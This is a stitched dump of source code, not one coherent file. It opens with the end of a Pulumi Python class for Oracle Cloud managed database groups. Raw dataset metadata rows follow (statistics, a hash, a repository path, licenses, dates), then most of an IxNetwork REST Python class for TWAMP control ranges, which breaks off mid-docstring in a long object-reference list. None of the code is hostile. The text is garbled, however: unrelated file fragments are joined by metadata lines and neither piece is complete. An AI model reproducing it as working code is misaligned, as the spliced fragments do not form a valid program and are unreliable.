                id=var["managed_database_id"],
            )])
        ```
        ## Import
        ManagedDatabaseGroups can be imported using the `id`, e.g.
        ```sh
        $ pulumi import oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup test_managed_database_group "id"
        ```
        :param str resource_name: The name of the resource.
        :param ManagedDatabaseGroupArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: if the caller passed a
        # ManagedDatabaseGroupArgs object, expand its fields into keyword
        # arguments; otherwise forward the arguments unchanged.
        resource_args, opts = _utilities.get_resource_args_opts(ManagedDatabaseGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: validates the
        # resource options, assembles the property bag, then registers the
        # resource with the Pulumi engine via CustomResource.__init__.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            # Default opts.version from this SDK build when the caller did not set one.
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No id given -> we are creating a new resource, not looking one up.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ManagedDatabaseGroupArgs.__new__(ManagedDatabaseGroupArgs)
            # compartment_id is required unless the engine supplied a URN for
            # an already-existing resource.
            if compartment_id is None and not opts.urn:
                raise TypeError("Missing required property 'compartment_id'")
            __props__.__dict__["compartment_id"] = compartment_id
            __props__.__dict__["description"] = description
            __props__.__dict__["managed_databases"] = managed_databases
            __props__.__dict__["name"] = name
            # Output-only properties start as None; the provider fills them in.
            __props__.__dict__["state"] = None
            __props__.__dict__["time_created"] = None
            __props__.__dict__["time_updated"] = None
        super(ManagedDatabaseGroup, __self__).__init__(
            'oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            compartment_id: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
            name: Optional[pulumi.Input[str]] = None,
            state: Optional[pulumi.Input[str]] = None,
            time_created: Optional[pulumi.Input[str]] = None,
            time_updated: Optional[pulumi.Input[str]] = None) -> 'ManagedDatabaseGroup':
        """
        Get an existing ManagedDatabaseGroup resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        :param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        :param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        :param pulumi.Input[str] state: The current lifecycle state of the Managed Database Group.
        :param pulumi.Input[str] time_created: The date and time the Managed Database Group was created.
        :param pulumi.Input[str] time_updated: The date and time the Managed Database Group was last updated.
        """
        # Merge the target id into the options, then build a state bag from
        # the caller-supplied lookup hints and re-instantiate the wrapper.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _ManagedDatabaseGroupState.__new__(_ManagedDatabaseGroupState)
        __props__.__dict__["compartment_id"] = compartment_id
        __props__.__dict__["description"] = description
        __props__.__dict__["managed_databases"] = managed_databases
        __props__.__dict__["name"] = name
        __props__.__dict__["state"] = state
        __props__.__dict__["time_created"] = time_created
        __props__.__dict__["time_updated"] = time_updated
        return ManagedDatabaseGroup(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> pulumi.Output[str]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
        """
        return pulumi.get(self, "compartment_id")
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[str]:
        """
        (Updatable) The information specified by the user about the Managed Database Group.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="managedDatabases")
    def managed_databases(self) -> pulumi.Output[Sequence['outputs.ManagedDatabaseGroupManagedDatabase']]:
        """
        (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
        """
        return pulumi.get(self, "managed_databases")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def state(self) -> pulumi.Output[str]:
        """
        The current lifecycle state of the Managed Database Group.
        """
        return pulumi.get(self, "state")
    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> pulumi.Output[str]:
        """
        The date and time the Managed Database Group was created.
        """
        return pulumi.get(self, "time_created")
    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> pulumi.Output[str]:
        """
        The date and time the Managed Database Group was last updated.
        """
        return pulumi.get(self, "time_updated")
| 52.06338
| 386
| 0.688264
| 2,570
| 22,179
| 5.770039
| 0.081712
| 0.064536
| 0.095758
| 0.086857
| 0.8538
| 0.834918
| 0.821364
| 0.81199
| 0.808551
| 0.783735
| 0
| 0.000058
| 0.222598
| 22,179
| 425
| 387
| 52.185882
| 0.859993
| 0.444294
| 0
| 0.634361
| 1
| 0
| 0.127932
| 0.042822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15859
| false
| 0.004405
| 0.030837
| 0
| 0.286344
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a138862a9fdc3db4049cd1d3b53d0df20618edaa
| 80,080
|
py
|
Python
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 20
|
2019-05-07T01:59:14.000Z
|
2022-02-11T05:24:47.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 60
|
2019-04-03T18:59:35.000Z
|
2022-02-22T12:05:05.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 13
|
2019-05-20T10:48:31.000Z
|
2021-10-06T07:45:44.000Z
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class TwampControlRange(Base):
"""Represents a range of TWAMP Control-Clients and Session-Sender.
The TwampControlRange class encapsulates a list of twampControlRange resources that are managed by the user.
A list of resources can be retrieved from the server using the TwampControlRange.find() method.
The list can be managed by using the TwampControlRange.add() and TwampControlRange.remove() methods.
"""
__slots__ = ()
# Name of this resource in the server-side Session Data Model (SDM).
_SDM_NAME = 'twampControlRange'
# Maps the Python-visible attribute names of this class to the
# corresponding attribute names used by the server's SDM.
_SDM_ATT_MAP = {
    'ControlServerIpIncrement': 'controlServerIpIncrement',
    'ControlServerPort': 'controlServerPort',
    'ControlStartServerIp': 'controlStartServerIp',
    'Count': 'count',
    'Enabled': 'enabled',
    'KeyId': 'keyId',
    'Mode': 'mode',
    'Name': 'name',
    'ObjectId': 'objectId',
    'Secret': 'secret',
}
# This resource declares no enum-valued attributes.
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
    """Attach this range under *parent* in the resource tree.

    Both arguments are forwarded unchanged to ``Base.__init__``.
    """
    super(TwampControlRange, self).__init__(parent, list_op)
@property
def ControlServerIpIncrement(self):
    # type: () -> str
    """Increment to use for above field when expanding sessions from this range.

    Returns
    -------
    - str: Increment to use for above field when expanding sessions from this range
    """
    key = self._SDM_ATT_MAP['ControlServerIpIncrement']
    return self._get_attribute(key)

@ControlServerIpIncrement.setter
def ControlServerIpIncrement(self, value):
    # type: (str) -> None
    key = self._SDM_ATT_MAP['ControlServerIpIncrement']
    self._set_attribute(key, value)
@property
def ControlServerPort(self):
    # type: () -> int
    """TWAMP Control-Server TCP port.

    Returns
    -------
    - number: TWAMP Control-Server TCP port.
    """
    attr = self._SDM_ATT_MAP['ControlServerPort']
    return self._get_attribute(attr)

@ControlServerPort.setter
def ControlServerPort(self, value):
    # type: (int) -> None
    attr = self._SDM_ATT_MAP['ControlServerPort']
    self._set_attribute(attr, value)
@property
def ControlStartServerIp(self):
    # type: () -> str
    """IP from which the Server accepts a Control-Session.

    Returns
    -------
    - str: IP from which the Server accepts a Control-Session
    """
    key = self._SDM_ATT_MAP['ControlStartServerIp']
    return self._get_attribute(key)

@ControlStartServerIp.setter
def ControlStartServerIp(self, value):
    # type: (str) -> None
    key = self._SDM_ATT_MAP['ControlStartServerIp']
    self._set_attribute(key, value)
@property
def Count(self):
    # type: () -> int
    """Total number of control sessions.

    Returns
    -------
    - number: Total number of control sessions
    """
    attr = self._SDM_ATT_MAP['Count']
    return self._get_attribute(attr)

@Count.setter
def Count(self, value):
    # type: (int) -> None
    attr = self._SDM_ATT_MAP['Count']
    self._set_attribute(attr, value)
@property
def Enabled(self):
    # type: () -> bool
    """Whether this range is active.

    Returns
    -------
    - bool: Disabled ranges won't be configured nor validated.
    """
    key = self._SDM_ATT_MAP['Enabled']
    return self._get_attribute(key)

@Enabled.setter
def Enabled(self, value):
    # type: (bool) -> None
    key = self._SDM_ATT_MAP['Enabled']
    self._set_attribute(key, value)
@property
def KeyId(self):
    # type: () -> str
    """Shared-secret selector for authentication/encryption.

    Returns
    -------
    - str: Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
    """
    attr = self._SDM_ATT_MAP['KeyId']
    return self._get_attribute(attr)

@KeyId.setter
def KeyId(self, value):
    # type: (str) -> None
    attr = self._SDM_ATT_MAP['KeyId']
    self._set_attribute(attr, value)
@property
def Mode(self):
    # type: () -> str
    """TWAMP mode of operation for the Control and Test Sessions.

    Returns
    -------
    - str: TWAMP mode of operation for the Control and Test Sessions
    """
    key = self._SDM_ATT_MAP['Mode']
    return self._get_attribute(key)

@Mode.setter
def Mode(self, value):
    # type: (str) -> None
    key = self._SDM_ATT_MAP['Mode']
    self._set_attribute(key, value)
@property
def Name(self):
    # type: () -> str
    """Name of range.

    Returns
    -------
    - str: Name of range
    """
    attr = self._SDM_ATT_MAP['Name']
    return self._get_attribute(attr)

@Name.setter
def Name(self, value):
    # type: (str) -> None
    attr = self._SDM_ATT_MAP['Name']
    self._set_attribute(attr, value)
@property
def ObjectId(self):
    # type: () -> str
    """Unique identifier for this object (read-only: no setter is defined).

    Returns
    -------
    - str: Unique identifier for this object
    """
    key = self._SDM_ATT_MAP['ObjectId']
    return self._get_attribute(key)
@property
def Secret(self):
    # type: () -> str
    """Shared secret used for key derivation.

    Returns
    -------
    - str: Shared secret used for key derivation
    """
    attr = self._SDM_ATT_MAP['Secret']
    return self._get_attribute(attr)

@Secret.setter
def Secret(self, value):
    # type: (str) -> None
    attr = self._SDM_ATT_MAP['Secret']
    self._set_attribute(attr, value)
def update(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, Secret=None):
    # type: (str, int, str, int, bool, str, str, str, str) -> TwampControlRange
    """Updates twampControlRange resource on the server.
    Args
    ----
    - ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
    - ControlServerPort (number): TWAMP Control-Server TCP port.
    - ControlStartServerIp (str): IP from which the Server accepts a Control-Session
    - Count (number): Total number of control sessions
    - Enabled (bool): Disabled ranges won't be configured nor validated.
    - KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
    - Mode (str): TWAMP mode of operation for the Control and Test Sessions
    - Name (str): Name of range
    - Secret (str): Shared secret used for key derivation
    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # locals() is captured before any other local exists, so it holds exactly
    # the parameters above; _map_locals (defined in Base) translates them to
    # their SDM names — presumably skipping None values; confirm in Base.
    return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, Secret=None):
    # type: (str, int, str, int, bool, str, str, str, str) -> TwampControlRange
    """Adds a new twampControlRange resource on the server and adds it to the container.
    Args
    ----
    - ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
    - ControlServerPort (number): TWAMP Control-Server TCP port.
    - ControlStartServerIp (str): IP from which the Server accepts a Control-Session
    - Count (number): Total number of control sessions
    - Enabled (bool): Disabled ranges won't be configured nor validated.
    - KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
    - Mode (str): TWAMP mode of operation for the Control and Test Sessions
    - Name (str): Name of range
    - Secret (str): Shared secret used for key derivation
    Returns
    -------
    - self: This instance with all currently retrieved twampControlRange resources using find and the newly added twampControlRange resources available through an iterator or index
    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # locals() must be taken before any other local variable is introduced;
    # _map_locals (Base) pairs the named parameters with their SDM names.
    return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
    """Deletes all the contained twampControlRange resources in this instance from the server.
    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Delegates to Base._delete; this method intentionally returns None.
    self._delete()
def find(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, ObjectId=None, Secret=None):
    # type: (str, int, str, int, bool, str, str, str, str, str) -> TwampControlRange
    """Finds and retrieves twampControlRange resources from the server.
    All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve twampControlRange resources from the server.
    To retrieve an exact match ensure the parameter value starts with ^ and ends with $
    By default the find method takes no parameters and will retrieve all twampControlRange resources from the server.
    Args
    ----
    - ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
    - ControlServerPort (number): TWAMP Control-Server TCP port.
    - ControlStartServerIp (str): IP from which the Server accepts a Control-Session
    - Count (number): Total number of control sessions
    - Enabled (bool): Disabled ranges won't be configured nor validated.
    - KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
    - Mode (str): TWAMP mode of operation for the Control and Test Sessions
    - Name (str): Name of range
    - ObjectId (str): Unique identifier for this object
    - Secret (str): Shared secret used for key derivation
    Returns
    -------
    - self: This instance with matching twampControlRange resources retrieved from the server available through an iterator or index
    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # locals() is captured before any other local exists; _map_locals (Base)
    # turns the named parameters into the server-side selection criteria.
    return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
    """Retrieves a single instance of twampControlRange data from the server.
    Args
    ----
    - href (str): An href to the instance to be retrieved
    Returns
    -------
    - self: This instance with the twampControlRange resources from the server available through an iterator or index
    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # The href fully identifies the instance; Base._read does the fetch.
    return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the customProtocolStack operation on the server.
    Create custom protocol stack under /vport/protocolStack
    customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
    ---------------------------------------------------------------
    - Arg2 (list(str)): List of plugin types to be added in the new custom stack
    - Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
    - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object itself (unlike the enable/disable execs, which
    # pass self.href); positional args fill ArgN slots starting at Arg2.
    payload = { "Arg1": self }
    for index, arg in enumerate(args, start=2):
        payload['Arg%s' % index] = arg
    # Keyword arguments (e.g. async_operation) are passed through verbatim.
    payload.update(kwargs)
    return self._execute('customProtocolStack', payload=payload, response_object=None)
def DisableProtocolStack(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[str, None]
    """Executes the disableProtocolStack operation on the server.
    Disable a protocol under protocolStack using the class name
    disableProtocolStack(Arg2=string, async_operation=bool)string
    -------------------------------------------------------------
    - Arg2 (str): Protocol class name to disable
    - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
    - Returns str: Status of the exec
    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object's href; positional args fill ArgN slots from Arg2 on.
    payload = { "Arg1": self.href }
    for index, arg in enumerate(args, start=2):
        payload['Arg%s' % index] = arg
    # Keyword arguments (e.g. async_operation) are passed through verbatim.
    payload.update(kwargs)
    return self._execute('disableProtocolStack', payload=payload, response_object=None)
def EnableProtocolStack(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[str, None]
    """Executes the enableProtocolStack operation on the server.
    Enable a protocol under protocolStack using the class name
    enableProtocolStack(Arg2=string, async_operation=bool)string
    ------------------------------------------------------------
    - Arg2 (str): Protocol class name to enable
    - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
    - Returns str: Status of the exec
    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object's href; positional args fill ArgN slots from Arg2 on.
    payload = { "Arg1": self.href }
    for index, arg in enumerate(args, start=2):
        payload['Arg%s' % index] = arg
    # Keyword arguments (e.g. async_operation) are passed through verbatim.
    payload.update(kwargs)
    return self._execute('enableProtocolStack', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the start operation on the server.

    Negotiate sessions for all protocols on all ranges belonging to selected plugins.

    The IxNetwork model allows for multiple method Signatures with the same name
    while python does not, so both forms are accepted here:

    start(async_operation=bool)
    ---------------------------
    - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.

    start(Arg2=enum, async_operation=bool)
    --------------------------------------
    - Arg2 (str(async | sync)): Execution mode. Applies to an array of object
      references to protocolStack plugin nodes (atm/ethernet endpoints, ranges
      and sub-ranges under /vport/protocolStack); see the IxNetwork API browser
      for the full list of valid objref targets.
    - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # NOTE: unlike disable/enableProtocolStack, Arg1 is the node object itself
    # (serialized by _execute), not its href.
    payload = {"Arg1": self}
    # Positional arguments map to Arg2, Arg3, ... per the server's exec signature.
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    # Keyword arguments (e.g. async_operation) are forwarded as-is.
    payload.update(kwargs)
    return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Teardown sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(Arg2=enum, async_operation=bool)
-------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRo
uter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/ra
nge/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/v
